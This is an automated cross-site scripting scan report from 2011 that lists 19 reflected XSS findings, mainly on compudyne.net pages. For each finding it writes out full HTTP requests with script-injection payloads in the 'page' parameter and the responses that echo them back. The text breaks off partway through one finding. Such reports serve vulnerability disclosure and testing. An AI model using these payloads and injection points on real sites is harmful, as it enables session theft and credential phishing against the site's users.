XSS, DORK, GHDB, Cross Site Scripting, compudyne.net

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Report generated by XSS.CX at Thu Apr 21 21:06:54 CDT 2011.


Hoyt LLC Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

XSS.CX Home | XSS.CX Research Blog

Loading

1. Cross-site scripting (reflected)

1.1. http://compudyne.net/about/index.php [name of an arbitrarily supplied request parameter]

1.2. http://compudyne.net/about/index.php [name of an arbitrarily supplied request parameter]

1.3. http://compudyne.net/about/index.php [page parameter]

1.4. http://compudyne.net/about/index.php [page parameter]

1.5. http://compudyne.net/about/press.php [name of an arbitrarily supplied request parameter]

1.6. http://compudyne.net/about/press.php [page parameter]

1.7. http://compudyne.net/about/print.php [page parameter]

1.8. http://compudyne.net/contact/index.php [name of an arbitrarily supplied request parameter]

1.9. http://compudyne.net/contact/index.php [name of an arbitrarily supplied request parameter]

1.10. http://compudyne.net/contact/index.php [page parameter]

1.11. http://compudyne.net/contact/index.php [page parameter]

1.12. http://compudyne.net/contact/print.php [page parameter]

1.13. http://compudyne.net/products-services/index.php [name of an arbitrarily supplied request parameter]

1.14. http://compudyne.net/products-services/index.php [name of an arbitrarily supplied request parameter]

1.15. http://compudyne.net/products-services/index.php [page parameter]

1.16. http://compudyne.net/products-services/index.php [page parameter]

1.17. http://compudyne.net/products-services/print.php [page parameter]

1.18. http://init.zopim.com/register [mID parameter]

1.19. http://widgets.digg.com/buttons/count [url parameter]



1. Cross-site scripting (reflected)
There are 19 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://compudyne.net/about/index.php [name of an arbitrarily supplied request parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://compudyne.net
Path:   /about/index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as text between TITLE tags. The payload 71d9c</title><script>alert(1)</script>01cbb1e710 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /about/index.php?page=Affiliations-Accreditat/71d9c</title><script>alert(1)</script>01cbb1e710ions HTTP/1.1
Host: compudyne.net
Proxy-Connection: keep-alive
Referer: http://compudyne.net/about/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 21 Apr 2011 21:07:37 GMT
Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.2 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-2ubuntu4.2
Vary: Accept-Encoding
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 3861

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >


<head>

<meta htt
...[SNIP]...
<title>
Affiliations-Accreditat/71d9c</title><script>alert(1)</script>01cbb1e710ions Compudyne :: Computer Services, Network Analysis, IT Planning, Network Design, Implementation & Support
</title>
...[SNIP]...

1.2. http://compudyne.net/about/index.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://compudyne.net
Path:   /about/index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2937"><script>alert(1)</script>748437efbe9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c2937\"><script>alert(1)</script>748437efbe9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /about/index.php?page=Affiliations-Accreditat/c2937"><script>alert(1)</script>748437efbe9ions HTTP/1.1
Host: compudyne.net
Proxy-Connection: keep-alive
Referer: http://compudyne.net/about/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 21 Apr 2011 21:07:31 GMT
Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.2 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-2ubuntu4.2
Vary: Accept-Encoding
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 3849

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >


<head>

<meta htt
...[SNIP]...
<a href="print.php?page=Affiliations-Accreditat/c2937\"><script>alert(1)</script>748437efbe9ions" target="_new">
...[SNIP]...

1.3. http://compudyne.net/about/index.php [page parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://compudyne.net
Path:   /about/index.php

Issue detail

The value of the page request parameter is copied into the HTML document as text between TITLE tags. The payload 55223</title><script>alert(1)</script>961dfd15060 was submitted in the page parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /about/index.php?page=Affiliations-Accreditations55223</title><script>alert(1)</script>961dfd15060 HTTP/1.1
Host: compudyne.net
Proxy-Connection: keep-alive
Referer: http://compudyne.net/about/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 21 Apr 2011 21:06:24 GMT
Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.2 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-2ubuntu4.2
Vary: Accept-Encoding
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 3861

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >


<head>

<meta htt
...[SNIP]...
<title>
Affiliations-Accreditations55223</title><script>alert(1)</script>961dfd15060 Compudyne :: Computer Services, Network Analysis, IT Planning, Network Design, Implementation & Support
</title>
...[SNIP]...

1.4. http://compudyne.net/about/index.php [page parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://compudyne.net
Path:   /about/index.php

Issue detail

The value of the page request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8495b"><script>alert(1)</script>ea97fcf7a16 was submitted in the page parameter. This input was echoed as 8495b\"><script>alert(1)</script>ea97fcf7a16 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /about/index.php?page=Affiliations-Accreditations8495b"><script>alert(1)</script>ea97fcf7a16 HTTP/1.1
Host: compudyne.net
Proxy-Connection: keep-alive
Referer: http://compudyne.net/about/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 21 Apr 2011 21:06:18 GMT
Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.2 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-2ubuntu4.2
Vary: Accept-Encoding
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 3845

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >


<head>

<meta htt
...[SNIP]...
<a href="print.php?page=Affiliations-Accreditations8495b\"><script>alert(1)</script>ea97fcf7a16" target="_new">
...[SNIP]...

1.5. http://compudyne.net/about/press.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://compudyne.net
Path:   /about/press.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as text between TITLE tags. The payload 8820d</title><script>alert(1)</script>45211e419b7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /about/press.php?page=5-28-09ChrisA-C/8820d</title><script>alert(1)</script>45211e419b7heri HTTP/1.1
Host: compudyne.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 21 Apr 2011 21:14:12 GMT
Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.2 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-2ubuntu4.2
Vary: Accept-Encoding
Content-Length: 2281
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="content-type" content="text/html;charset=iso-8859-1">
<meta name="Keywords" content="Compudyne, Duluth,
...[SNIP]...
<title>
5-28-09ChrisA-C/8820d</title><script>alert(1)</script>45211e419b7heri Compudyne :: Computer Services, Network Analysis, IT Planning, Network Design, Implementation & Support
</title>
...[SNIP]...

1.6. http://compudyne.net/about/press.php [page parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://compudyne.net
Path:   /about/press.php

Issue detail

The value of the page request parameter is copied into the HTML document as text between TITLE tags. The payload d7eb3</title><script>alert(1)</script>669ddfa81dd was submitted in the page parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /about/press.php?page=5-28-09ChrisA-Cherid7eb3</title><script>alert(1)</script>669ddfa81dd HTTP/1.1
Host: compudyne.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 21 Apr 2011 21:14:07 GMT
Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.2 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-2ubuntu4.2
Vary: Accept-Encoding
Content-Length: 2278
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="content-type" content="text/html;charset=iso-8859-1">
<meta name="Keywords" content="Compudyne, Duluth,
...[SNIP]...
<title>
5-28-09ChrisA-Cherid7eb3</title><script>alert(1)</script>669ddfa81dd Compudyne :: Computer Services, Network Analysis, IT Planning, Network Design, Implementation & Support
</title>
...[SNIP]...

1.7. http://compudyne.net/about/print.php [page parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://compudyne.net
Path:   /about/print.php

Issue detail

The value of the page request parameter is copied into the HTML document as text between TITLE tags. The payload 9fc1f</title><script>alert(1)</script>8f16a3dbf2b was submitted in the page parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /about/print.php?page=9fc1f</title><script>alert(1)</script>8f16a3dbf2b HTTP/1.1
Host: compudyne.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 21 Apr 2011 21:14:03 GMT
Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.2 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-2ubuntu4.2
Vary: Accept-Encoding
Content-Length: 2898
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="content-type" content="text/html;charset=iso-8859-1">
<meta name="Keywords" content="Compudyne, Duluth,
...[SNIP]...
<title>
9fc1f</title><script>alert(1)</script>8f16a3dbf2b Compudyne :: Computer Services, Network Analysis, IT Planning, Network Design, Implementation & Support
</title>
...[SNIP]...

1.8. http://compudyne.net/contact/index.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://compudyne.net
Path:   /contact/index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f5e2"><script>alert(1)</script>be5099f3023 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3f5e2\"><script>alert(1)</script>be5099f3023 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact/index.php?page=E/3f5e2"><script>alert(1)</script>be5099f3023mail HTTP/1.1
Host: compudyne.net
Proxy-Connection: keep-alive
Referer: http://compudyne.net/contact/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 21 Apr 2011 21:07:31 GMT
Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.2 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-2ubuntu4.2
Vary: Accept-Encoding
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 4449

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >


<head>

<meta htt
...[SNIP]...
<a href="print.php?page=E/3f5e2\"><script>alert(1)</script>be5099f3023mail" target="_new">
...[SNIP]...

1.9. http://compudyne.net/contact/index.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://compudyne.net
Path:   /contact/index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as text between TITLE tags. The payload 63d5d</title><script>alert(1)</script>90d120fcc9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact/index.php?page=E/63d5d</title><script>alert(1)</script>90d120fcc9mail HTTP/1.1
Host: compudyne.net
Proxy-Connection: keep-alive
Referer: http://compudyne.net/contact/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 21 Apr 2011 21:07:37 GMT
Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.2 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-2ubuntu4.2
Vary: Accept-Encoding
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 4461

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >


<head>

<meta htt
...[SNIP]...
<title>
E/63d5d</title><script>alert(1)</script>90d120fcc9mail Compudyne :: Computer Services, Network Analysis, IT Planning, Network Design, Implementation & Support
</title>
...[SNIP]...

1.10. http://compudyne.net/contact/index.php [page parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://compudyne.net
Path:   /contact/index.php

Issue detail

The value of the page request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bad1c"><script>alert(1)</script>ee5dd7f6d36 was submitted in the page parameter. This input was echoed as bad1c\"><script>alert(1)</script>ee5dd7f6d36 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact/index.php?page=Emailbad1c"><script>alert(1)</script>ee5dd7f6d36 HTTP/1.1
Host: compudyne.net
Proxy-Connection: keep-alive
Referer: http://compudyne.net/contact/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 21 Apr 2011 21:06:18 GMT
Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.2 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-2ubuntu4.2
Vary: Accept-Encoding
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 4445

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >


<head>

<meta htt
...[SNIP]...
<a href="print.php?page=Emailbad1c\"><script>alert(1)</script>ee5dd7f6d36" target="_new">
...[SNIP]...

1.11. http://compudyne.net/contact/index.php [page parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://compudyne.net
Path:   /contact/index.php

Issue detail

The value of the page request parameter is copied into the HTML document as text between TITLE tags. The payload a347e</title><script>alert(1)</script>627fd1f4cb0 was submitted in the page parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact/index.php?page=Emaila347e</title><script>alert(1)</script>627fd1f4cb0 HTTP/1.1
Host: compudyne.net
Proxy-Connection: keep-alive
Referer: http://compudyne.net/contact/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 21 Apr 2011 21:06:24 GMT
Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.2 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-2ubuntu4.2
Vary: Accept-Encoding
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 4461

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >


<head>

<meta htt
...[SNIP]...
<title>
Emaila347e</title><script>alert(1)</script>627fd1f4cb0 Compudyne :: Computer Services, Network Analysis, IT Planning, Network Design, Implementation & Support
</title>
...[SNIP]...

1.12. http://compudyne.net/contact/print.php [page parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://compudyne.net
Path:   /contact/print.php

Issue detail

The value of the page request parameter is copied into the HTML document as text between TITLE tags. The payload 54dfa</title><script>alert(1)</script>bafbff97447 was submitted in the page parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact/print.php?page=54dfa</title><script>alert(1)</script>bafbff97447 HTTP/1.1
Host: compudyne.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 21 Apr 2011 21:13:46 GMT
Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.2 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-2ubuntu4.2
Vary: Accept-Encoding
Content-Length: 2875
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="content-type" content="text/html;charset=iso-8859-1">
<meta name="Keywords" content="Compudyne, Duluth,
...[SNIP]...
<title>
54dfa</title><script>alert(1)</script>bafbff97447 Compudyne :: Computer Services, Network Analysis, IT Planning, Network Design, Implementation & Support
</title>
...[SNIP]...

1.13. http://compudyne.net/products-services/index.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://compudyne.net
Path:   /products-services/index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as text between TITLE tags. The payload 3c8ea</title><script>alert(1)</script>42f6f789681 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products-services/index.php?page=EDGE-Anti-/3c8ea</title><script>alert(1)</script>42f6f789681Spam HTTP/1.1
Host: compudyne.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 21 Apr 2011 20:16:00 GMT
Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.2 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-2ubuntu4.2
Vary: Accept-Encoding
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 4708

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >


<head>

<meta htt
...[SNIP]...
<title>
EDGE-Anti-/3c8ea</title><script>alert(1)</script>42f6f789681Spam Compudyne :: Computer Services, Network Analysis, IT Planning, Network Design, Implementation & Support
</title>
...[SNIP]...

1.14. http://compudyne.net/products-services/index.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://compudyne.net
Path:   /products-services/index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c453"><script>alert(1)</script>36106184f12 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6c453\"><script>alert(1)</script>36106184f12 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products-services/index.php?page=EDGE-Anti-/6c453"><script>alert(1)</script>36106184f12Spam HTTP/1.1
Host: compudyne.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 21 Apr 2011 20:15:54 GMT
Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.2 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-2ubuntu4.2
Vary: Accept-Encoding
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 4692

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >


<head>

<meta htt
...[SNIP]...
<a href="print.php?page=EDGE-Anti-/6c453\"><script>alert(1)</script>36106184f12Spam" target="_new">
...[SNIP]...

1.15. http://compudyne.net/products-services/index.php [page parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://compudyne.net
Path:   /products-services/index.php

Issue detail

The value of the page request parameter is copied into the HTML document as text between TITLE tags. The payload 1226d</title><script>alert(1)</script>f0de2b7738a was submitted in the page parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products-services/index.php?page=EDGE-Anti-Spam1226d</title><script>alert(1)</script>f0de2b7738a HTTP/1.1
Host: compudyne.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 21 Apr 2011 20:15:12 GMT
Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.2 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-2ubuntu4.2
Vary: Accept-Encoding
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 4704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >


<head>

<meta htt
...[SNIP]...
<title>
EDGE-Anti-Spam1226d</title><script>alert(1)</script>f0de2b7738a Compudyne :: Computer Services, Network Analysis, IT Planning, Network Design, Implementation & Support
</title>
...[SNIP]...

1.16. http://compudyne.net/products-services/index.php [page parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://compudyne.net
Path:   /products-services/index.php

Issue detail

The value of the page request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ddda"><script>alert(1)</script>ec0e962dd34 was submitted in the page parameter. This input was echoed as 5ddda\"><script>alert(1)</script>ec0e962dd34 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products-services/index.php?page=EDGE-Anti-Spam5ddda"><script>alert(1)</script>ec0e962dd34 HTTP/1.1
Host: compudyne.net
Proxy-Connection: keep-alive
